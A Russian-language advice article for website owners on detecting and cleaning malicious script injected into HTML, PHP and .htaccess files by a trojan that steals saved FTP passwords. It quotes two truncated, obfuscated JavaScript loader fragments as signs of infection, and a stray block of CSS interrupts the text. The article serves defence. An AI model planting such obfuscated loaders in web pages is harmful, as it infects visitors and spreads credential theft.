Эта статья адресована в первую очередь всем владельцам собственных вебсайтов. Возможно, вы уже сталкивались с враждебным вторжением, а может быть, вам это еще только предстоит. Но в любом случае далеко не всегда виноватым является хостинг.
В последнее время участились случаи внедрения вредоносного кода в HTML и PHP страницы, а также в файл .htaccess. Как это проявляется?
- При доступе к своему сайту вы можете получать сообщения об ошибках php, если там применяются скрипты или используется какой-либо движок на PHP (wordpress, joomla).
- Обычные HTML страницы могут быть искажены или доступ к ним ограничен либо полностью отсутствовать.
- Возможно появление ошибки выполнения скриптов 500 при заражении .htaccess.
- Сообщение антивирусных программ о заражении при открытии своих сайтов.
- Что-либо другое, не соответствующее нормальной работе вебсайта.
Что все это значит и как проверяется?
При просмотре исходного кода вебстраниц вначале или в самом конце присутствует загадочный код как правило в виде кодированного javascript. Скажем вот такого вида (приводится не полностью):
<script>function vyVdxyxdaYY(vyatVYybYVy){ var vYdbddxaVaV=530; return(parseInt(vyatVYybYVy,16));}function vayatyaVatd(vVayxytttdy) { var vdxxaxdaYVy=530; var vtVbxYytbYa=''; for(vYbbbaxVbYx=0; vYbbbaxVbYx<vvayxytttdy.length;>...
или
<!-- [ ab2aab4b9d766629b77b9b4febadeb6f ] --><script>eval (unescape('function%20crZnLPY%28uTm%29%7Bfunction%20sPWGz%28unYS%29%7 Bvar%20fUrEeI%3D0%2CvEImT%2CtKGn%3DunYS. length%3Bfor%28vEImT%3D0%3BvEImT%3CtKGn%3BvEImT++%29fUrEeI+%3DunYS. charCodeAt%28vEImT%29*tKGn%3Breturn%20new%20String%28fUrEeI%29%7DuTm%3 Dunescape%28uTm%29%3Bvar%20uneE%3Deval%28%27ajrdgMu% 3Amje%3Fn%3Ft%3Fs%3F.%3Fcda%3Fldlde%3Fe%3A%27. replace%28/%5BM%5C%3Fdj%5C%3A%5D/g%2C%20%27%27%29%29.toString ...
.csharpcode, .csharpcode pre
{
font-size: small;
color: black;
font-family: consolas, «Courier New», courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
{
background-color: #f4f4f4;
width: 100%;
margin: 0em;
}
.csharpcode .lnum { color: #606060; }Это самый достоверный признак заражения вредоносным кодом. При посещении вашей страницы при помощи Internet Explorer (как правило) компьютер пользователя заражается трояном и цепная реакция продолжается. Вирус ищет новые лазейки для распространения при этом собирая пароли.
Кто посмел это сделать и как его найти?
В 99% случаев источником данного заражения собственных вебсайтов являетесь вы! Ваш компьютер с Windows уже заражен трояном, который, используя пароли доступа по FTP к вашим вебсайтам, без вашего ведома проникает на них и заражает файлы в корневой публичной папке. По последним данным заражению могут подвергаться и вложенные папки до нескольких уровней вложения. Заражаются файлы HTML, PHP, .htaccess. Самые последние вирусы могут изменять расширения HTML файлов на .htm. Код дописывается в конец файла. И при загрузке страницы запускает iframe. И цепочка продолжается.
Что делать и как быть?
- Проверить компьютер на предмет наличия вирусов и делать это систематически, регулярно обновляя вирусные базы.
- Проверить компьютер на трояны и spyware, если антивирус этого не позволяет.
- Сменить пароль на доступ к серверу.
- Отменить сохранение пароля в FTP-менеджерах, которыми вы пользуетесь как администратор FTP-сервера (Total Commander, Far, и т.п.) — т.е вводить пароли вручную.
- Регулярно проводить архивирование незараженных вебсайтов.
Единственный способ лечения это скачивание вебсайта (при отсутствии локальной копии) и ручное удаление вредоносного кода. Либо выгрузка чистой сохраненной версии.
Небольшой совет профессионалов: ftp пароли можно сохранять с дописанным одним символом и при запросе пароля его просто удалять.
При соблюдении указанных действий появление новых заражений прекращается.